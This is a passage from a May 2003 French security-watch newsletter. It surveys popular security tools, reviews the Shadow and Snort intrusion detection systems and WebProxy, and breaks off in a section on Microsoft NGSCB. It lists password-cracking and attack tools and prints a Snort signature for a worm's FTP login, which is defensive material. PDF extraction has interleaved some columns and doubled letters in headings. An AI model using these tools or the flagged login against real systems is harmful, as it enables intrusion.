Veille Technologique Sécurité

Transcription

Veille Technologique Sécurité
APOGEE Communications
R
dee
orrtt d
po
pp
Raap
Veille Technologique Sécurité
N
8
58
N°°5
Mai 2003
Les informations fournies dans ce document ont été collectées et compilées à partir de
sources d'origines diverses et publiquement accessibles: mailing-lists, newsgroups, sites
Web, ...
Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis
de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains
thèmes sont validées à la date de la rédaction du document.
Les symboles d’avertissement suivants seront éventuellement utilisés:
!
"
Site dont la consultation est susceptible de générer directement ou indirectement,
une attaque sur l’équipement de consultation, voire de faire encourir un risque sur
le système d’information associé.
Site susceptible d’héberger des informations ou des programmes dont l’utilisation
est répréhensible au titre de la Loi Française.
Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la
qualité des applets et autres ressources présentées au navigateur WEB.
LLaa ddiiffffuussiioonn ddee ccee ddooccuum
meenntt eesstt rreessttrreeiinnttee aauuxx
cclliieennttss ddeess sseerrvviicceess
V
VTTS
S--R
RA
APPPPO
OR
RTT eett V
VTTS
S--EEN
NTTR
REEPPR
RIIS
SEE
Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs.
APOGEE Communications
1, Rue Jean Rostand
91893 ORSAY CEDEX
Pour tous renseignements
Offre de veille:
http://www.apogee-com.fr/veille
Informations:
[email protected]
© APOGEE Communications - Tous droits réservés
Mai 2003
Au sommaire de ce rapport …
PRODUITS ET TECHNOLOGIES
LES PRODUITS
5
5
RÉFÉRENCES
75
5
OUTILS DE SÉCURITÉ
5
DÉTECTION D’INTRUSION
7
ISSEC - SHADOW 1.8
7
AUDIT
7
@STAKE - WEBPROXY 2.1
SNORT 2.0
LES TECHNOLOGIES
7
8
10
ORDINATEURS PERSONNELS
10
MICROSOFT – INFRASTRUCTURE ATHENS ET BASE DE SÉCURITÉ NGSCB
INFORMATIONS ET LÉGISLATION
LES INFORMATIONS
12
12
WINDOWS 2003
12
MICROSOFT – WINDOWS 2003 SECURITY GUIDE
MICROSOFT – WS2003 & XP THREATS AND COUNTERMEASURES GUIDE
WINDOWS 2000
MICROSOFT – WINDOWS 2000 HARDENING GUIDE
PRÉVENTION
12
14
16
16
17
CMU/SEI – MISE À JOUR DU ‘CSIRT HANBOOK’
LA
10
LÉGISLATION
CRITÈRES COMMUNS
17
18
18
CC – 4IÈME CONFÉRENCE INTERNATIONALE
18
DMCA
19
DMCA – SUR LA LÉGALITÉ DES ÉQUIPEMENTS DE SÉCURITÉ
19
LOGICIELS LIBRES
LES SERVICES DE BASE
LES OUTILS
21
21
21
NORMES ET STANDARDS
LES PUBLICATIONS DE L’IETF
23
23
LES
LES
RFC
DRAFTS
NOS COMMENTAIRES
LES RFC
RFC 3526
LES DRAFTS
DRAFT-IAB-AUTH-MECH-00
DRAFT-IETF-IPSEC-IKEV2-ALGORITHMS-00
ALERTES ET ATTAQUES
ALERTES
GUIDE DE LECTURE
FORMAT DE LA PRÉSENTATION
SYNTHÈSE MENSUELLE
ALERTES DÉTAILLÉES
AVIS OFFICIELS
ADOBE
BEA
CISCO
ETHEREAL
GNUPG
HP
HTTP
IBM
LINUX DEBIAN
LINUX REDHAT
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
23
23
28
28
28
29
29
30
31
31
31
32
32
33
33
33
33
33
34
34
34
34
34
35
35
Page 2/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
MICROSOFT
NESSUS
ORACLE
POPTOP
QUALCOMM
REALNETWORKS
SCRIPTLOGIC
SGI
SUN
XINETD
35
36
36
36
36
36
36
36
37
38
ALERTES NON CONFIRMÉES
3COM
APPLE
FLOOSIETEK
IISPROTECT
KERIO
LINUX MANDRAKE
MICROSOFT
MIRABILIS
MOD_SURVEY
NETSCAPE
OPERA
SLMAIL
SLOCATE
YOUNGZSOFT
38
38
38
38
38
38
38
38
39
39
39
39
39
39
40
AUTRES INFORMATIONS
40
REPRISES D’AVIS
40
ET
CORRECTIFS
CIAC
CISCO
FREEBSD
HP
LINUX CALDERA
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
MICROSOFT
OPERA
ORACLE
SGI
SUN
40
41
41
41
41
42
42
42
42
43
43
43
43
CODES D’EXPLOITATION
43
BULLETINS ET NOTES
43
KERIO
APPLE
OPENBSD
VIRUS
ATTAQUES
OUTILS
KNOPPIX-MIB
SUBSEVEN LEGENDS "
SPAMD
TECHNIQUES
IRC IPV6 - SCAN OF THE MONTH
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
43
43
44
44
45
45
45
45
46
49
49
Page 3/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Le mot de la rédaction …
L’annulation des conférences qui devaient se tenir à l’occasion du salon Infosec2003 confirme une tendance qui semble engagée depuis maintenant 3 ans, celui
de la désaffection du public pour les manifestations dans le domaine de la
sécurité informatique. Deux hypothèses peuvent être formulées qui cependant
ne permettent pas d’expliquer l’ampleur de ce phénomène :
-
la disponibilité d’informations de très grande qualité sur l’Internet qui
permettent à tout un chacun d’approfondir un sujet sous réserve toutefois de
maîtriser la langue anglaise,
-
la trop grande spécialisation de ces salons alliée au trop large spectre des
conférences proposées.
Dans le cas particulier du salon Infosec, il faudra toutefois tenir compte de
l’impact des mouvements de grève et d’un mois de mai comme toujours
parsemé de jours fériés et de ponts.
Ce même mois aura vu l’apparition d’un phénomène jusqu’alors sans précédent
provoqué par le ver ‘Fizzer’. Intégrant une fonctionnalité de pilotage à distance
utilisant les canaux de communication offerts par les réseaux ‘IRC’, ce ver aura
mis à plat ceux-ci en quelques jours sans que leurs opérateurs puissent en
reprendre immédiatement le contrôle.
A cette occasion, un procédé d’éradication inédit aura vu le jour mis au point par
l’opérateur d’un petit réseau: les connexions ‘IRC’ sont interceptées par un
serveur ‘IRC’ dédié jouant le rôle d’un relais. Celui-ci joue un double rôle:
‘portail’ informant l’utilisateur ‘humain’ de la nécessité de se reconnecter sur un
autre point d’entrée, ‘sonde de collecte’ permettant d’établir la liste des
serveurs et postes infectés.
Plusieurs techniques alternatives ou complémentaires fort intéressantes sont
proposées sur la page WEB ‘http://www.debugoutput.com/fizzer/tools/’.
L’équipe de Veille Technologique
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 4/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
PR
RO
OD
DU
UIIT
TS
SE
ET
T TE
EC
CH
HN
NO
OL
LO
OG
GIIE
ES
S
LES
PRODUITS
REFERENCES
75
OUTILS DE SECURITE
# Description
Une enquête conduite en mai dernier par ‘FYODOR’ (le responsable du site ‘insecure.org’ et l’auteur
de l’outil ‘nmap’) a permis de déterminer les outils de sécurité – gratuits ou payants – les plus
couramment utilisés par les abonnés de la liste de diffusion ‘nmap-hacker’.
Quelques 1854 personnes ont ainsi répondu à cette enquête en indiquant quels étaient leurs huit utilitaires favoris
permettant d’établir une liste de 75 utilitaires et de comparer celle-ci à celle produite en l’an 2000. L’utilitaire ‘nmap’
était bien entendu hors-concours puisque le sondage était principalement adressé à des utilisateurs de cet outil.
Nous reproduisons ci-dessous la liste présentée sur le site ‘insecure.org’ en utilisant la même symbolique et la même
organisation:
- ‘C’ : Produit commercial
- ‘L’ : Fonctionne en environnement LINUX
- ‘U’ : Fonctionne en environnement OpenBSD et autres UNIX
- ‘W’ : Fonctionne en environnement Windows
Pour certains produits, le lecteur pourra se reporter aux articles publiés dans nos rapports mensuels dont le numéro
est précisé dans la colonne ‘VTS’.
N
1
C
L
U
W
Nom du produit
Nessus
Fonction
Sondage et recherche de vulnérabilités
2
Ethereal
Collecte et analyse de flux réseau
3
Snort
Détection d’intrusion
4
netcat
Connexion et transfert de flux réseau
5
TcpDump
Collecte et analyse de flux réseau
6
hping2
Recherche d’équipements actifs
16
7
dsniff
Collecte d’information et attaque de services sécurisés
29
8
GFI LanGuard
Sondage et recherche de vulnérabilités
9
EtterCap
Collecte et analyse de flux réseau
10
Whisker
Sondage et recherche de vulnérabilités WEB
11
John the ripper
Attaque en force des mots de passe UNIX et Windows
12
OpenSSH / SSH
Accès distant sécurisé
13
Sam Spade
Recherche dans les bases d’information Internet
20
14
ISS Internet Scanner
Outil de sondage et de recherche de vulnérabilité
15
15
Tripwire
Contrôle d’intégrité
20
16
Nikto
Sondage et recherche de vulnérabilités WEB
17
Kismet
Recherche et sondage des points d’accès Wireless
18
SuperScan
Outil de sondage des services TCP
19
L0phtCrack 4
Attaque en force des mots de passe Windows
20
Retina
Outil de sondage et de recherche de vulnérabilité
21
22
NetFilter
Traceroute, …
Filtrage des accès UDP/TCP
Outils d’analyse et de test réseau
23
fport
Etat des connexions UDP/TCP sous Windows
24
Saint
Outil de sondage et de recherche de vulnérabilité
25
NetworkStumbler
Recherche et sondage des points d’accès Wireless
26
Sara
Outil de sondage et de recherche de vulnérabilité
27
N-Stealth
Sondage et recherche de vulnérabilités WEB
28
AirSnort
Recherche et sondage des points d’accès Wireless
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
VTS
56
57
11
36
47, 54
6
16
20
10
Page 5/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
29
NBTScan
Collecte informations NetBIOS
30
GnuPG/PGP
Confidentialité
31
Firewalk
Recherche d’équipements actifs
Cain & Abel
Attaque en force des mots de passe Windows
Xprobe2
Recherche et identification d’équipements actifs
34
SolarWinds toolset
Collection d’outils d’analyse et d’attaque réseau
35
Ngrep
Recherche de chaîne dans un flux réseau
36
Perl/Python
Langages de programmation
37
Thc-Amap
Recherche et identification d’équipements actifs
38
OpenSSL
Confidentialité des flux
39
ntop
Surveillance des flux
40
nemesis
Création et injection de paquets
41
LsOf
Etat des fichiers et connexions sockets
42
43
Hunt
honeyd
Collecte et manipulation de flux réseau
Pot de miel
57
44
achilles
Interception et manipulation des sessions WEB
41
45
Brutus
Attaque en force des authentifiants
46
stunnel
Tunnel SSL
50
47
Paketto Keiretsu
Manipulation des flux TCP/IP
53
48
FragRoute
Attaque réseau
49
SPIKE Proxy
Interception et manipulation des sessions WEB
50
THC-Hydra
Attaque en force des authentifiants
51
OpenBSD
Système d’exploitation sécurisé
52
TCP_Wrapper
Contrôle d’accès aux services UNIX
53
Pwdump3
Attaque en force des authentifiants Windows NT / 2K
54
LibNet
Acquisition et transmission de trames
55
IpTraf
Surveillance des flux
56
fping
Recherche d’équipements actifs
57
Bastille
Sécurisation des OS Linux, Mac OsX et HP-UX
58
WinFingerprint
Recherche et identification d’équipements actifs
59
TCPTraceroute
Analyse des chemins d’accès
60
Shadow Sec. Scanner
Outil de sondage et de recherche de vulnérabilité
61
pf
Filtrage des accès UDP/TCP
62
LIDS
Détection d’intrusions
63
hfchecknet
Audit de configuration Windows
64
65
etherape
dig
Surveillance des flux graphique
Interrogation DNS
66
Crack / CrackLib
Attaque en force des mots de passe UNIX
67
cheops
Outil de sondage et de recherche de vulnérabilité
68
Zone alarm
Pare feu personnel
69
Visual Route
Interrogation bases de l’Internet
70
71
TCT
tcpreplay
Investigation
Création et injection de paquets
72
snoop
Collecte et analyse de flux réseau
73
putty
Terminal SSH
74
pstools
Administration des systèmes Windows
75
arpwatch
Contrôle d’accès et surveillance des adresses
32
33
x
4
49
45
40
37
45
20, 54
51
# Complément d'information
http://www.insecure.org/tools.html
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 6/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
DETECTION D’INTRUSION
ISSEC - SHADOW 1.8
# Description
En 1994, le projet ‘CIDER’ - Cooperative Intrusion Detection Evaluation and Response –
était initié aux Etats-Unis dans l’optique d’identifier, de documenter voire d’améliorer les logiciels de
sécurité existants dont, en particulier, les outils de détection d’intrusion.
L’effort conjoint de quelques organisations gouvernementales (le SANS, la NSA et le NSWC) et
d’une société spécialisée dans ce domaine (NFR – Network Flight Recorder) a permis d’engager le
projet ‘SHADOW’ – Secondary Heuristic Analysis for Defensive Inline Warfare - visant à
développer un outil de détection d’intrusion simple, innovant (et toujours efficace en 2003).
Ce projet a notamment eu pour résultat la publication dès 1996 de l’outil ‘Shadow’ permettant d’identifier les
tentatives d’attaques coordonnées et furtives:
- ‘attaques coordonnées’ car issues de sources multiples mais partageant une même stratégie,
- ‘attaques furtives’ car réparties dans le temps pour ne pas déclencher les systèmes de détection basés sur un seuil.
Pour cela, ‘Shadow’ ne s’intéresse aucunement au contenu des paquets mais uniquement à la chronologie de ceux-ci
en appliquant un procédé d’analyse statistique à long terme. Celui-ci autorise le filtrage des événements à faible durée
de vie en mettant en évidence le ‘bruit de fond’ généralement non étudié ainsi que la corrélation entre évènements
issus de sources différentes.
Fonctionnant sur plates-formes LINUX, et plus particulièrement sur la distribution ‘RedHat’, cet outil majoritairement
écrit en langage ‘perl’ utilise une infrastructure de type ‘sondes/console’ ou ‘sensor/analyser’ pour reprendre la
terminologie originale:
- les sondes distribuées sur le(s) réseau(x) devant être surveillés collectent les trames au moyen de l’outil, ‘tcpdump’
et assurent le pré-traitement de celles-ci,
- la console est chargée de la collecte périodique des événements produits par les sondes pour analyse statistique et
présentation des résultats consultables via une interface WEB.
Cet outil est toujours maintenu par les laboratoires du ‘NSWC’ ou ‘Naval Surface Warfare Center’, une division de
la marine américaine spécialisée dans la contre-mesure et la guerre électronique. Ainsi, 20 mois après la parution de
la version 1.7, le ‘NSWC’ vient d’annoncer la disponibilité de la version 1.8. Il s’agit cependant d’une version de
maintenance qui, bien que n’apportant aucune nouvelle fonctionnalité, corrige quelques bogues et simplifie la
configuration.
Outil fortement ‘textuel’ donc quelque peu à la traîne par rapport au marché, ‘Shadow’ requiert un travail conséquent
de configuration notamment vis à vis des filtres, tous exprimés en respectant la syntaxe ‘tcpdump’ dont on ne peut
dire qu’elle soit simple à utiliser. Cependant, et sous réserve de maintenir à jour les différents utilitaires externes
employés dont ‘tcpdump’ et ‘nmap’, ‘shadow’ permettra la mise en évidence d’évènements généralement passés
sous silence car statistiquement bien en dessous du seuil de détection des outils classiques.
Rappelons enfin l’absolue nécessité de synchroniser toutes les sondes afin de garantir la fiabilité du processus de
corrélation.
# Complément d'information
http://www.nswc.navy.mil/ISSEC/CID/
http://www.nswc.navy.mil/ISSEC/CID/Install.pdf
http://www.isp-planet.com/services/ids/shadow.html
Site d’accueil
Documentation
Etude du produit
AUDIT
@STAKE - WEBPROXY 2.1
# Description
En janvier 2003, la société ‘@stake’ annonçait l’arrêt du support de la version gratuite de
l’utilitaire ‘WebProxy 1.0’ au profit de la distribution d’une nouvelle version commerciale
accessible à des coûts allant de $995 pour 1 licence à $21000 pour 25 licences.
Rappelons que ‘WebProxy’ permet d’analyser les échanges effectués entre un navigateur et un site ‘WEB’ en
s’intercalant de manière totalement transparente dans la session. L’utilisateur pourra ainsi non seulement collecter les
données échangées mais aussi modifier celles-ci avant d’étudier la réaction du site ‘WEB’ face à des requêtes
inattendues ou rejouées.
Une nouvelle version vient d’être diffusée qui corrige divers bogues et intègre trois nouvelles fonctions fort utiles:
1. La possibilité de suivre n’importe quel lien sur une quelconque profondeur et d’automatiquement identifier les
formulaires ainsi que les pages d’erreurs,
2. Le support de la méthode d’authentification dite ‘NTLM’ permettant de tester les sites ‘WEB’ utilisant ou
requerrant l’utilisation de celle-ci,
3. Le contrôle de la présence de fichiers et de pages pouvant présenter un risque de sécurité – fonction ‘Forced
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 7/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Browsing’ - notamment dans les environnements : ‘ColdFusion’, ‘Domino’, ‘IIS’.
Pour en savoir plus sur ce remarquable outil, le lecteur pourra se reporter à notre article de présentation publié dans le
rapport de veille N°54 (Janvier 2003) mais aussi à la documentation désormais directement accessible en ligne sur le
site de l’éditeur.
# Complément d'information
http://www.atstake.com/webproxy/
http://www.atstake.com/webproxy/doc/
Site d’accueil
Documentation en ligne
SNORT 2.0
# Description
‘Snort’ est un célèbre outil de détection d’intrusion réseau accessible gratuitement, capable de faire de la détection
d’intrusion en temps réel mais aussi de la capture de paquets IP. Déjà présenté à travers nos analyses des ‘défis
honeynet’, nous nous proposons de détailler les nouveautés apparues avec la version 2.0, non sans avoir
préalablement rappelé le principe de fonctionnement général de cet outil.
‘Snort’ peut être utilisé de trois manières :
# En tant qu’analyseur réseau: à l’instar d’un ‘tcpdump’ ou d’un ‘snoop’, il permet de visualiser un certain nombre
d’informations sur les paquets transitant sur le réseau,
# En outil de capture de paquets: il permet d’enregistrer tous les paquets transitant sur le réseau, avec la possibilité
d’affiner la capture au moyen de filtres,
# Comme sonde de détection d’intrusions réseau: il recherche les signatures d’attaques connues en s’appuyant sur
une base de règles.
Analyseur Réseau
En mode analyseur réseau, ‘Snort’ lit et décode tous les paquets qu’il capture sur le réseau puis les imprime sur la
sortie standard. En cumulant les options –v et –d on peut obtenir une visualisation de la totalité des données
circulant sur le réseau.
Exemple d’utilisation de Snort en mode analyseur réseau
On peut également sélectionner une partie
du trafic grâce à l’utilisation de filtres #./snort -v -d not port 22
Running in packet dump mode
spécifiques.
Log directory = /var/log/snort
Dans ce mode, ‘Snort’ donne un certain Initializing Network Interface eth0
--== Initializing Snort ==-nombre d’informations relatives aux entêtes
Initializing Output Plugins!
des paquets, ainsi qu’une représentation Decoding Ethernet on interface eth0
hexadécimale et ASCII de la zone de
--== Initialization Complete ==--*> Snort! <*données des paquets.
Version 2.0.0 (Build 72)
Les informations fournies, plus détaillées que By Martin Roesch ([email protected], www.snort.org)
celles retournées par ‘tcpdump’, mettent 05/19-15:10:12.511262 ARP who-has xx.xx.xx.161 tell xx.xx.xx.24
directement en évidence les éléments 05/19-15:10:12.552113 ARP who-has xx.xx.xx.221 tell xx.xx.xx.72
05/19-15:10:12.661080 xx.xx.xx.29:1347 -> xx.xx.xx.255:7938
pertinents dans les en-têtes des paquets.
UDP TTL:128 TOS:0x0 ID:25418 IpLen:20 DgmLen:84
On notera que la taille des paquets capturés Len: 56
est, par défaut, celle du ‘MTU’ – Maximum 3E C9 5B 84 00 00 00 00 00 00 00 02 00 01 86 A0 >.[.............
Tranfer Unit – de l’interface sur laquelle 00 00 00 02 00 00 00 05 00 00 00 00 00 00 00 00 ................
‘Snort’ écoute. Ce fonctionnement est à 00 00 00 00 00 00 00 00 00 05 F3 DD 00 00 00 02 ................
00 00 00 00 00 00 00 00
........
l’opposé de celui de ‘tcpdump’ qui, lui, =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
utilise par défaut une taille fixe sans tenir 05/19-15:10:12.661435 xx.xx.xx.29:1347 -> xx.xx.xx.255:111
compte des caractéristiques du média UDP TTL:128 TOS:0x0 ID:25420 IpLen:20 DgmLen:84
Len: 56
physique.
3E C9 5B 84 00 00 00 00 00 00 00 02 00 01 86 A0 >.[.............
On remarquera cependant que ‘Snort’ n’est 00 00 00 02 00 00 00 05 00 00 00 00 00 00 00 00 ................
pas souvent utilisé comme analyseur réseau, 00 00 00 00 00 00 00 00 00 05 F3 DD 00 00 00 02 ................
........
la fonction lui étant généralement attribuée 00 00 00 00 00 00 00 00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
étant la détection d’intrusion.
Capture de paquets
Utilisé dans ce mode, ‘Snort’ enregistre tous les paquets qu’il voit dans une forme décodée en ASCII. Ce mode est
activé en utilisant l’option –l qui permet de spécifier le répertoire dans lequel enregistrer les paquets. Un répertoire
est créé par adresse IP source ou destination (en fonction des options choisies), et les paquets concernant chaque
connexion enregistrée sont rangés dans le répertoire correspondant à la source ou destination de la connexion.
Notons qu’il est également possible d’enregistrer les paquets sous forme binaire plutôt que sous forme décodée en
ASCII, ce qui permettra leur étude ultérieure avec des outils comme ‘Ethereal’, ‘Sniffer Pro’, … ou tout autre outil
d’analyse graphique.
Il est possible d’utiliser conjointement le mode analyseur de paquets et le mode capture, mais il faut garder en tête
que les performances au niveau de l’enregistrement peuvent être impactées par la lenteur du terminal.
Détection d’intrusion
Ce mode est le plus couramment utilisé. ‘Snort’ passe en mode «détection d’intrusion» à partir du moment où un
fichier de configuration lui est spécifié.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 8/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
On indiquera dans celui-ci les différentes options de fonctionnement de la sonde de détection d’intrusion, comme le
format d’export des données, les règles à utiliser, les différents pré-processeurs devant être activés ainsi que leurs
options de fonctionnement, etc …
Les différents modules qui composent la sonde de détection d’intrusion sont les suivants :
Snort decoder
Le décodeur permet de paramétrer la finesse de la remontée d’alertes sur la nature et la normalité du trafic
observé. On peut ainsi désactiver les alertes sur l’utilisation d’options expérimentales ou obsolètes dans les entêtes TCP de paquets, mais également sur l’utilisation d’options dans les paquets IP.
Moteur de détection
Il est possible de configurer le moteur de détection de Ex :
manière à optimiser l’utilisation des ressources même sur # Configure the detection engine
# ===============================
des petites configurations.
# Use a different pattern matcher in case you have a
Par l’utilisation de mots clefs, on adapte en fait le mode de # machine with very limited resources:
# config detection: search-method lowmem
fonctionnement de ‘Snort’ à la configuration que l’on a.
‘frag2’
Pré-processeur de dé-fragmentation IP
Ce pré-processeur permet de détecter les attaques de fragmentation (habituellement des dénis de service),
mais également les tentatives de recouvrement de fragment destinées à court-circuiter le mécanisme de filtrage
mis en œuvre sur certains équipements ne gérant pas correctement ce type de paquets.
‘stream4’ :
Pré-processeur d’inspection à état
Ce pré-processeur permet la détection de signatures d’attaques uniquement dans des connexions établies. Il est
ainsi possible d’éliminer les tentatives de saturation de la sonde visant à consommer toutes les ressources du
système hébergeant la sonde, généralement en envoyant un grand nombre de paquets contenant des chaînes
correspondant à des signatures d’attaques connues !
Il permet également de détecter différents types de sondage de ports avec la possibilité de déterminer le
système d’exploitation par l’analyse des empreintes spécifiques à la pile TCP/IP du système distant.
La directive stream4_reassemble permet de définir les flux qui devront être ré-assemblés. Par défaut, seuls le
sont ceux allant du client vers le serveur.
‘http_decode’
Pré-processeur de normalisation des requêtes HTTP
Ce processeur permet de normaliser les requêtes HTTP émises à destination de serveurs surveillés par la
sonde, en remplaçant toutes les occurrences de types ‘%XX’ par l’équivalent ASCII. Ceci permet de détecter les
tentatives de dissimulation d’attaques par de multiples encodages des requêtes.
‘rpc_decode’
Pré-processeur de normalisation des requêtes RPC
Les requêtes RPC peuvent utiliser différents encodages, en dehors de l’encodage sur 4 octets habituels. Ce préprocesseur travaille de manière similaire à http_decode, et permet de détecter les tentatives de dissimulation
d’attaques sur des RPC (Remote Processus Call ou Appel Distant de Procédure).
‘bo_detector’
Détecteur de trafic Back Orifice
Ce processeur détecte la présence de trafic Back Orifice dans les flux observés. Notons qu’avec la version 2.0, il
est désormais plus nécessaire de spécifier un port TCP pour identifier le trafic Back Orifice.
Pour mémoire, Back Orifice est un outil de prise de contrôle à distance utilisable sur des plates-formes win32,
très en vogue il y a quelques temps, et présent dans de nombreux chevaux de Troie.
‘telnet_decode’
Normalisation des chaînes de négociation de connexion telnet
Ce pré-processeur normalise les chaînes de négociation des connexions ‘telnet’ pour les flux telnet mais aussi
ftp. Il fonctionne d’une manière similaire à rpc_decode et http_decode.
Il recherche dans le trafic les données non conformes aux spécifications, et remplace celles-ci par une
représentation normalisée, autorisant ainsi une détection de signature générique, car indépendante de toutes
les différentes possibilités d’encodage des données.
‘portscan’
Pré-processeur de détection de sondage tcp / udp
Ce pré-processeur permet de détecter les paquets UDP ou les TCP SYN (demande de connexion) à destination
d’un nombre configurable de ports dans un laps de temps lui aussi paramétrable, ce type d’activité étant en
effet révélateur d’un sondage de ports.
Une directive permet de spécifier les machines pour lesquelles il ne faudra pas annoncer la détection d’un
sondage, typiquement les serveurs DNS. En effet dans le cas de plusieurs requêtes successives, le serveur DNS
renverra plusieurs paquets UDP ayant des ports ‘destination’ différents à l’attention de la machine ayant
effectué les requêtes avec donc le risque de déclencher une alerte par erreur.
Observons que les sondages furtifs TCP seront déjà détectés par le module stream4.
‘arpspoof’
Détection expérimentale d’attaques ARP
Ce pré-processeur permet de détecter les attaques visant à provoquer la corruption des caches ARP des
équipements réseau dans le but de détourner du trafic. Une attaque de type «man in the middle» au niveau
ARP permet de prendre complètement le contrôle des données échangées si la couche de transport ne garantie
pas l’intégrité des données.
Notons toutefois que l’utilisation de ce pré-processeur n’est pas conseillée, car il est annoncé dans l’état
expérimental. De plus son utilisation implique de définir toutes les correspondances IP / MAC autorisées, ce qui
peut être fastidieux dans le cas d’un réseau de production.
‘conversation’, ‘portscan2’ Nouveau pré-processeur de détection de sondage
Le pré-processeur portscan2 permet de détecter les tentatives de sondage TCP,UDP ou ICMP en s’appuyant
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 9/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
sur un pré-processeur de surveillance des «conversations» (le terme connexion n’a de sens qu’avec TCP), et
une définition de seuils statistiques. En cas de dépassement de l’un des ces seuils, le pré-processeur remonte
une alerte.
Il est possible de faire figurer dans une «whitelist» les machines à ne pas comptabiliser, comme par exemple
les serveurs DNS.
Règles
Les règles définissent les signatures d’attaques Exemple de règle:
# suspicious login attempts
à détecter.
alert tcp $EXTERNAL_NET any -> $HOME_NET 21
Elles sont classées par catégories:
(msg:"FTP ADMw0rm ftp login attempt";
- pop2.rules contient toutes les règles
flow:to_server,established;
relatives à des attaques sur le protocole pop2
content:"USER w0rm|0D0A|";
et ses différentes implémentations logicielles,
reference:arachnids,01;
- web-iis.rules contient les signatures
sid:144;
d’attaques impactant des serveurs IIS,
classtype:suspicious-login;
- ...
rev:6;)
Export de données
‘Snort’ dispose de plusieurs formats d’export de données pour la représentation des alertes remontées par les
différents pré-processeurs que nous venons de lister. Cela va du simple fichier texte récapitulatif à l’export dans
des bases de données, permettant ensuite l’exploitation centralisée des alertes, au moyen de consoles de
centralisation.
Parmi les solutions centralisées de gestion de sondes ‘Snort’, on notera ACID, un produit libre, mais également
DEMARC qui est un produit commercial permettant la gestion des alertes remontées et la configuration des
agents ‘Snort’. Dans le cadre d’une utilisation personnelle, DEMARC propose une version gratuite de leur
solution.
La fonctionnalité de détection d’intrusion de ‘Snort’ a fait de ce projet un des plus répandus du monde OpenSource
dans les milieux de la sécurité. ‘Snort’ est en effet souvent en «compétition» avec d’autres produits commerciaux, et
même souvent intégré dans des produits commerciaux. Les signatures d’attaques développées pour ‘Snort’ sont
désormais exploitables par différentes sondes de détection d’intrusion dont ‘Dragon’, ou encore ‘RealSecure’.
Les nouveautés apportées par la version 2.0 concernent principalement l’écriture des pré-processeurs ‘Portscan2’ – le
pré-processeur ‘PortScan1’ étant abandonné - et ‘Conversation’ mais aussi la correction de nombreux bugs et de la
faille de sécurité concernant les versions antérieures ou égales à 1.9.1. Cette faille permet d’exécuter du code avec les
privilèges de ‘root’. Notons également qu’un gros travail sur l’écriture de règles et la réécriture de règles existantes a
été effectué.
# Complément d'information
http://www.snort.org
http://www.demarc.com
http://www.andrew.cmu.edu/~rdanyliw/snort/snortacid.html
http://www.securityfocus.com/infocus/1577
LES
Site officiel du projet Snort
Editeur de solutions intégrant Snort
Site officiel du projet ACID
IDS detection evasion paper
TECHNOLOGIES
ORDINATEURS PERSONNELS
MICROSOFT – INFRASTRUCTURE ATHENS ET BASE DE SECURITE NGSCB
# Description
Le prototype d’une nouvelle architecture de PC portant le nom de code ‘athens’ a été dévoilé par Bill Gates durant la
12ième conférence annuelle ‘WinHEC’ – Windows Hardware Engineering Conference – qui s’est tenue du 6 au 8
mai dernier à la Nouvelle Orléans.
L’objectif de cette présentation était de démontrer que les futures innovations dans ce domaine ne pouvaient voir le
jour qu’à la condition de développer conjointement le matériel et le logiciel. Cette prise de position – antagonique de la
position jusqu’alors tenue par Microsoft – semble fortement liée à l’initiative ‘Trustworthy Computing’ visant à
intégrer les fonctionnalités de sécurité au plus bas niveau des architectures systèmes. Dans cette logique, en effet, il
apparaît difficile de découpler, comme cela était jusqu’alors le cas, le développement du matériel et la conception du
système d’exploitation.
Dans l’optique de faciliter mais aussi de promouvoir cette nouvelle stratégie, Microsoft annonce la création du site
‘Windows Hardware and Driver Central’ - ou ‘WHDC’ - regroupant l’ensemble des informations permettant de
garantir la conformité des développements vis à vis des spécifications édictées par l’éditeur. Encore à l’état
embryonnaire, ce site rassemble déjà de nombreux documents et outils dont certains n’étaient jusqu’alors accessibles
que par le biais des distributions ‘SDK’ (Software Developpement Kit) et ‘DDK’ (Driver Developpement Kit).
Le lecteur intéressé par les technologies employées dans les architectures existantes et futures trouvera sur ce site les
spécifications des différentes infrastructures matérielles (PC mobile, Plates-formes 64 bits, …), des bus de
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 10/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
communication (PCI, FireWire, USB2) ou encore de différents constituants dédiés (affichage, gestion de l’alimentation,
multimédia, réseaux, stockage, …).
Une part importante de la conférence ‘WinHEC’ semble avoir été consacrée à la stratégie développée par Microsoft
dans le cadre de l’initiative ‘Trustworthy Computing’ et jusqu’alors connue du grand public sous le nom de code
‘Palladium’.
En reprenant le concept de ‘TCB’ – Trusted
Computing Base – élaboré dans les années 70
et fondement des principes décrits dans le
